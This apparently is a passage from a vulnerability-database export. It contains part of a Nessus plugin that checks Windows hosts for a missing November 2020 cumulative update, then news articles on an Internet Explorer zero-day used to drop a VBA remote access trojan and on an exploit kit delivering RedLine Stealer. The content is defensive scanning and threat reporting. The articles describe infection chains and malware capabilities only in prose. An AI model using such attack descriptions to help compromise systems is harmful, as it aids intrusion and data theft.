(CVE-2020-17027)\n\n - Windows Remote Access Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-17025,\n CVE-2020-17026, CVE-2020-17027, CVE-2020-17031, CVE-2020-17032, CVE-2020-17033, CVE-2020-17034,\n CVE-2020-17043, CVE-2020-17044, CVE-2020-17055. (CVE-2020-17028)\n\n - Windows Canonical Display Driver Information Disclosure Vulnerability (CVE-2020-17029)\n\n - Windows Remote Access Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-17025,\n CVE-2020-17026, CVE-2020-17027, CVE-2020-17028, CVE-2020-17032, CVE-2020-17033, CVE-2020-17034,\n CVE-2020-17043, CVE-2020-17044, CVE-2020-17055. (CVE-2020-17031)\n\n - Windows Remote Access Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-17025,\n CVE-2020-17026, CVE-2020-17027, CVE-2020-17028, CVE-2020-17031, CVE-2020-17033, CVE-2020-17034,\n CVE-2020-17043, CVE-2020-17044, CVE-2020-17055. (CVE-2020-17032)\n\n - Windows Remote Access Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-17025,\n CVE-2020-17026, CVE-2020-17027, CVE-2020-17028, CVE-2020-17031, CVE-2020-17032, CVE-2020-17034,\n CVE-2020-17043, CVE-2020-17044, CVE-2020-17055. (CVE-2020-17033)\n\n - Windows Remote Access Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-17025,\n CVE-2020-17026, CVE-2020-17027, CVE-2020-17028, CVE-2020-17031, CVE-2020-17032, CVE-2020-17033,\n CVE-2020-17043, CVE-2020-17044, CVE-2020-17055. (CVE-2020-17034)\n\n - Windows Kernel Elevation of Privilege Vulnerability (CVE-2020-17035)\n\n - Windows Function Discovery SSDP Provider Information Disclosure Vulnerability (CVE-2020-17036)\n\n - Windows WalletService Elevation of Privilege Vulnerability (CVE-2020-17037)\n\n - Win32k Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-17010. (CVE-2020-17038)\n\n - Windows Hyper-V Security Feature Bypass Vulnerability (CVE-2020-17040)\n\n - Windows Print Configuration Elevation of Privilege Vulnerability (CVE-2020-17041)\n\n - Windows Print Spooler Remote Code Execution Vulnerability (CVE-2020-17042)\n\n - Windows Remote Access Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-17025,\n CVE-2020-17026, CVE-2020-17027, CVE-2020-17028, CVE-2020-17031, CVE-2020-17032, CVE-2020-17033,\n CVE-2020-17034, CVE-2020-17044, CVE-2020-17055. (CVE-2020-17043)\n\n - Windows Remote Access Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-17025,\n CVE-2020-17026, CVE-2020-17027, CVE-2020-17028, CVE-2020-17031, CVE-2020-17032, CVE-2020-17033,\n CVE-2020-17034, CVE-2020-17043, CVE-2020-17055. (CVE-2020-17044)\n\n - Windows KernelStream Information Disclosure Vulnerability (CVE-2020-17045)\n\n - Windows Error Reporting Denial of Service Vulnerability (CVE-2020-17046)\n\n - Windows Network File System Denial of Service Vulnerability (CVE-2020-17047)\n\n - Chakra Scripting Engine Memory Corruption Vulnerability This CVE ID is unique from CVE-2020-17054.\n (CVE-2020-17048)\n\n - Kerberos Security Feature Bypass Vulnerability (CVE-2020-17049)\n\n - Windows Network File System Remote Code Execution Vulnerability (CVE-2020-17051)\n\n - Scripting Engine Memory Corruption Vulnerability (CVE-2020-17052)\n\n - Chakra Scripting Engine Memory Corruption Vulnerability This CVE ID is unique from CVE-2020-17048.\n (CVE-2020-17054)\n\n - Microsoft Browser Memory Corruption Vulnerability (CVE-2020-17058)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://support.microsoft.com/en-us/help/4586830/windows-10-update-kb4586830\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f8c32243\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4586830.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-17051\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/11/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/11/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/11/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS20-11\";\nkbs = make_list('4586830');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"14393\",\n rollup_date:\"11_2020\",\n bulletin:bulletin,\n rollup_kb_list:[4586830])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2022-05-09T12:39:17", "description": "[![](https://thehackernews.com/images/-I2pNCdG5Z4Q/YQLGX235y6I/AAAAAAAADYo/5ghaW_-O9UcVkr2h1ElM9OK55A4BtxsUwCLcBGAsYHQ/s0/malware-attack.jpg)](<https://thehackernews.com/images/-I2pNCdG5Z4Q/YQLGX235y6I/AAAAAAAADYo/5ghaW_-O9UcVkr2h1ElM9OK55A4BtxsUwCLcBGAsYHQ/s0/malware-attack.jpg>)\n\nAn unidentified threat actor has been exploiting a now-patched zero-day flaw in Internet Explorer browser to deliver a fully-featured VBA-based remote access trojan (RAT) capable of accessing files stored in compromised Windows systems, and downloading and executing malicious payloads as part of an \"unusual\" campaign.\n\nThe backdoor is distributed via a decoy document named \"Manifest.docx\" that loads the exploit code for the vulnerability from an embedded template, which, in turn, executes shellcode to deploy the RAT, according to cybersecurity firm Malwarebytes, which spotted the suspicious Word file on July 21, 2021. \n\nThe malware-laced document claims to be a \"Manifesto of the inhabitants of Crimea\" calling on the citizens to oppose Russian President Vladimir Putin and \"create a unified platform called 'People's Resistance.'\"\n\nThe Internet Explorer flaw, tracked as **CVE-2021-26411**, is notable for the fact that it was abused by the North Korea-backed Lazarus Group to [target security researchers](<https://thehackernews.com/2021/01/n-korean-hackers-targeting-security.html>) working on vulnerability research and development.\n\nEarlier this February, South Korean cybersecurity firm ENKI [revealed](<https://enki.co.kr/blog/2021/02/04/ie_0day.html>) the state-aligned hacking collective had made an unsuccessful attempt at targeting its security researchers with malicious MHTML files that, when opened, downloaded two payloads from a remote server, one of which contained a zero-day against Internet Explorer. Microsoft [addressed the issue](<https://thehackernews.com/2021/03/microsoft-issues-security-patches-for.html>) as part of its Patch Tuesday updates for March.\n\n[![](https://thehackernews.com/images/-lZ4BcbcuZ5w/YQLCARxT1bI/AAAAAAAADYg/ng5r_-f-4f0B0RS2Mf-rIkCbF0u_7vKTQCLcBGAsYHQ/s0/malware.jpg)](<https://thehackernews.com/images/-lZ4BcbcuZ5w/YQLCARxT1bI/AAAAAAAADYg/ng5r_-f-4f0B0RS2Mf-rIkCbF0u_7vKTQCLcBGAsYHQ/s0/malware.jpg>)\n\nThe Internet Explorer exploit is one of the two ways that's used to deploy the RAT, with the other method relying on a social engineering component that involves downloading and executing a remote macro-weaponized template containing the implant. Regardless of the infection chain, the use of double attack vectors is likely an attempt to increase the likelihood of finding a path into the targeted machines.\n\n\"While both techniques rely on template injection to drop a full-featured remote access trojan, the IE exploit (CVE-2021-26411) previously used by the Lazarus APT is an unusual discovery,\" Malwarebytes researcher Hossein Jazi said in a [report](<https://blog.malwarebytes.com/threat-intelligence/2021/07/crimea-manifesto-deploys-vba-rat-using-double-attack-vectors/>) shared with The Hacker News. \"The attackers may have wanted to combine social engineering and exploit to maximize their chances of infecting targets.\"\n\nBesides collecting system metadata, the VBA RAT is orchestrated to identify antivirus products running on the infected host and execute commands it receives from an attacker-controlled server, including reading, deleting, and downloading arbitrary files, and exfiltrate the results of those commands back to the server.\n\nAlso discovered by Malwarebytes is a PHP-based panel nicknamed \"Ekipa\" that's used by the adversary to track victims and view information about the modus operandi that led to the successful breach, highlighting successful exploitation using the IE zero-day and the execution of the RAT.\n\n\"As the [conflict between Russia and Ukraine](<https://en.wikipedia.org/wiki/Russo-Ukrainian_War>) over Crimea continues, cyber attacks have been increasing as well,\" Jazi said. \"The decoy document contains a manifesto that shows a possible motive (Crimea) and target (Russian and pro-Russian individuals) behind this attack. However, it could also have been used as a false flag.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-07-29T15:18:00", "type": "thn", "title": "Hackers Exploit Microsoft Browser Bug to Deploy VBA Malware on Targeted PCs", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26411"], "modified": "2021-07-29T15:18:26", "id": "THN:BE0D8117CAD7D5DE97C405935DA09BC3", "href": "https://thehackernews.com/2021/07/hackers-exploit-microsoft-browser-bug.html", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:39:25", "description": "[![RIG Exploit Kit](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjoNnACNL4tRXhmeRID1KNB0_0j084PU17zaVDx1SxcV1CFt2BlV43KNXnZkDDAR985mEgiQcsym3EvrPBUSnvxY2MeEYVkQM4xXlSNUzbLB98CzlGZ4a9VsE0crb-4OSGd6167GXHRqsv_Q1nVk-reN0Jwy6FUir34MAXaXtejrxv4Fdin_zG4w0Hy/s728-e1000/Malware-botnet.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjoNnACNL4tRXhmeRID1KNB0_0j084PU17zaVDx1SxcV1CFt2BlV43KNXnZkDDAR985mEgiQcsym3EvrPBUSnvxY2MeEYVkQM4xXlSNUzbLB98CzlGZ4a9VsE0crb-4OSGd6167GXHRqsv_Q1nVk-reN0Jwy6FUir34MAXaXtejrxv4Fdin_zG4w0Hy/s728-e100/Malware-botnet.jpg>)\n\nA new campaign leveraging an exploit kit has been observed abusing an Internet Explorer flaw patched by Microsoft last year to deliver the RedLine Stealer trojan.\n\n\"When executed, RedLine Stealer performs recon against the target system (including username, hardware, browsers installed, anti-virus software) and then exfiltrates data (including passwords, saved credit cards, crypto wallets, VPN logins) to a remote command and control server,\" Bitdefender [said](<https://www.bitdefender.com/blog/labs/redline-stealer-resurfaces-in-fresh-rig-exploit-kit-campaign/>) in a new report shared with The Ha

March 9, 2021—KB5000803 (OS Build 14393.4283)

Description

Related